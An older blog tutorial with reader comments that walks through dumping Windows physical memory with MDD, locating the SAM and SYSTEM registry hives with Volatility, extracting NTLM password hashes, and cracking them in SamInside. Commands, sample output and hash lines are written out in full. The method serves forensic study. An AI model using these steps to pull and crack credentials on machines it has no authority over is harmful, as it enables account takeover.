Dumping Physical Memory to extract SAM Hashes
Tools Needed : MDD pyCrypto Volatility 1.3 Beta Volatility Plugin from Moyix ManTech Memory DD (MDD) (http://www.mantech.com/msma/MDD.asp) is released under GPL by Mantech International. MDD is capable of copying the complete contents of memory on the following Microsoft Operating Systems: Windows 2000, Windows XP, Windows 2003 Server, Windows 2008 Server. After downloading MDD from the Mantech site you need to run
Tools Needed :
ManTech Memory DD (MDD) (http://www.mantech.com/msma/MDD.asp) is released under GPL by Mantech International. MDD is capable of copying the complete contents of memory on the following Microsoft Operating Systems: Windows 2000, Windows XP, Windows 2003 Server, Windows 2008 Server.
After downloading MDD from the Mantech site you need to run the program at the command line.
MDD Command Line Usage:
mdd -o OUTPUTFILENAME
Step by Step Example :
First of all, run MDD to dump the memory of the machine. The output file , would be an image of the physical memory, and MDD is often used to only dump the memory.
C:\Documents and Settings\Administrator\Desktop\MDD>mdd_1.3.exe -o dump.dd
-> mdd
-> ManTech Physical Memory Dump Utility
Copyright (C) 2008 ManTech Security & Mission Assurance
-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w’
This is free software, and you are welcome to redistribute it
under certain conditions; use option `-c’ for details.
-> Dumping 511.48 MB of physical memory to file ‘dump.dd’.
130938 map operations succeeded (1.00)
0 map operations failed
took 32 seconds to write
MD5 is: 78924418adaf67d22a6687dcc6ff4e23
C:\Documents and Settings\Administrator\Desktop\MDD>
Next, we will need to analyze the “memory image” – dump.dd .
For this, we will be using Using Volatility (1.3_Beta), Volatility Plugin from Moyix, and a Windows Hash/Password Finder (SamInside) to identify the passwords.
1. First of all, most of these scripts are written in python, and as such, you would need to download and install a python interpreter (Active Python ).
2. Download Volatility (1.3_Beta) , extract it to a folder.
3. Download Volatility Plugin from Moyix, extract it, and copy its content into the Volatility folder, overwriting your existing forensics, memory_objects, and memory_plugins folders.
4. Download pyCrypto and install it.
5. Copy the dump.dd file (output file of MDD) into the Volatility folder.
6. Run hivescan from volatility to get the hive offsets. Execute the following:
C:\Documents and Settings\Administrator\Desktop\Volatility-1.3_Beta> python volatility hivescan -f dump.dd
Offset (hex)
45147992 0×2b0e758
45393752 0×2b4a758
49832984 0×2f86418
56797016 0×362a758
58091352 0×3766758
64191328 0×3d37b60
145440776 0×8ab4008
146819936 0×8c04b60
147082080 0×8c44b60
197245792 0xbc1bb60
215368912 0xcd644d0
228964464 0xda5b870
244838408 0xe97f008
271077384 0×10285008
271171592 0×1029c008
361696096 0×158f0b60
373147760 0×163dc870
401433808 0×17ed64d0
425734152 0×19603008
435642376 0×19f76008
452021088 0×1af14b60
489651040 0×1d2f7b60
506391392 0×1e2eeb60
509397104 0×1e5cc870
526976208 0×1f6904d0
C:\Documents and Settings\Administrator\Desktop\Volatility-1.3_Beta>
7. Next, Run hivelist from volatility with the first hivescan offset, from previous output. Execute the following:
C:\Documents and Settings\Administrator\Desktop\Volatility-1.3_Beta>python volatility hivelist -f dump.dd -o 0×2b0e758
Address Name
0xe1cda008 \Documents and Settings\Administrator\Local Settings\Application Da
ta\Microsoft\Windows\UsrClass.dat
0xe1cc4008 \Documents and Settings\Administrator\NTUSER.DAT
0xe1afeb60 \Documents and Settings\LocalService\Local Settings\Application Dat
a\Microsoft\Windows\UsrClass.dat
0xe1b4c008 \Documents and Settings\LocalService\NTUSER.DAT
0xe1b13870 \Documents and Settings\NetworkService\Local Settings\Application D
ata\Microsoft\Windows\UsrClass.dat
0xe1b004d0 \Documents and Settings\NetworkService\NTUSER.DAT
0xe1609b60 \WINDOWS\system32\config\software
0xe160bb60 \WINDOWS\system32\config\default
0xe1741b60 \WINDOWS\system32\config\SAM
0xe1607008 \WINDOWS\system32\config\SECURITY
0xe142e418 [no name]
0xe1036758 \WINDOWS\system32\config\system
0xe1022758 [no name]
C:\Documents and Settings\Administrator\Desktop\Volatility-1.3_Beta>
8. Now that we have the address locations, Pay attention to SAM & SYSTEM addresses. Find Password Hash using this command : python volatility hashdump -f dump.dd -y System Hive Offset -s SAM Hive Offset.
python volatility hashdump -f dump.dd -y 0xe1036758 -s 0xe1741b60
Extracted SAM :
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:e342f6782d705142f81cce8f13488846:5cc6a7ed5dce2e04e648b8b6c14c9eed:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:00fb5891d8488d816968e68a09a868b8:::
john:1003:972d6bbe1f00e65eaad3b435b51404ee:69bf94898385467264708f3cc51cf0a4:::
Now you can just open this as a pwdump file in SamInside and crack it !
Source: Warlock
on March 31st, 2009 at 5:40 am
It didn’t work for a AD DC. However it did work for a XP system.
on May 23rd, 2009 at 10:25 pm
It didn’t work for AD because it uses kerberos authentication instead of NTLM
on September 21st, 2009 at 7:52 pm
Useless as must be run as administrator – and that’s the problem – we peed-ons don’t have the access we need, and are trying to get admin access. If we had admin access we wouldn’t need MDD to get it.
on August 9th, 2010 at 5:15 pm
i have windows 7 ultimate x64 and when i try to dump memory i get this:
C:\tools>mdd.exe -o dump.dd
-> mdd
-> ManTech Physical Memory Dump Utility
Copyright (C) 2008 ManTech Security & Mission Assurance
-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w’
This is free software, and you are welcome to redistribute it
under certain conditions; use option `-c’ for details.
-> ERROR: Vista 64-bit and above require a signed driver file
-> ERROR: Unable to extract driver…
-> ERROR: Failed to open PhysicalMemory section!
What should i do for make it work?
on September 1st, 2010 at 11:53 am
>>What should i do for make it work?
It’s all right!!! Windows 7 has new secure rules!
on December 31st, 2010 at 9:11 pm
That problem is vedabas you don’t have the permission, run mdd as administrator